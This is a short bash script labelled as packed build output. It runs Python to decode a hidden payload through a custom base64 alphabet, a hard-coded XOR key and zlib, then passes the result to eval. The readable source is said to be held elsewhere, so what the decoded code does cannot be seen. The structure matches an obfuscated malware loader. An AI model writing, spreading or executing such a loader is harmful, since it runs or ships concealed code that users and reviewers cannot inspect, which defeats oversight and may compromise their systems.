#!/usr/bin/env bash
# Packed script — generated by Scripts/build/pack.py. Do not edit.
# (The readable source lives with the project author.)
eval "$(python3 -c "
import base64, zlib
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c = 'qZ3mK9xVdWyB1pS7nRc8LtJfE0hUoI4aXwG6vN2bY5rQiOgMlAjszDkCePFuHT+/'
k = b'K\x19~\x825\xc1\no\x91-'
p = '1H7sK+GBjc+Zry8gtHj30me7X5q4VRJMX0haysPbnidhlJphDT+gXqepELqcpLSsWJ4XZXEASnkLTrBjdrPoPL9DxNDsfHeo8hIoL6sTlz8q7qklVbw1srtZXG62e5bQOmNQ1Hyjt3n3H0pPW3mkotcASldb1Ajsriyv9faUY8BCrpv/Rv3YHwl0lOeEy0HtqK1zcBLz6ErtxoxQx7Z3Ek8cbDD5rop9a+h1z6+l4DB6qrzAw540sn9wewbqXQG0Uyq/mIYOBODzuXzXvWNSdsfds7jrUwNx/+bsLPD9JYMDoN6gVHHsqzvLcsYKA6krrCknBanqqBtP1i/oIFMAVzCwIXJCwJzVbvaboW5hw6hp6ExPoRELJsNcl43ByVMockr01r2mQnF3f9P+aM9Ddu61O8h6PjBxwJpcJ6SoSdV8/p5ou07mvKySDwdzfmns3T0p'.translate(str.maketrans(c, a))
raw = base64.b64decode(p)
d = bytes(v ^ k[i % len(k)] for i, v in enumerate(raw))
import sys; sys.stdout.write(zlib.decompress(d).decode('utf-8'))
")"
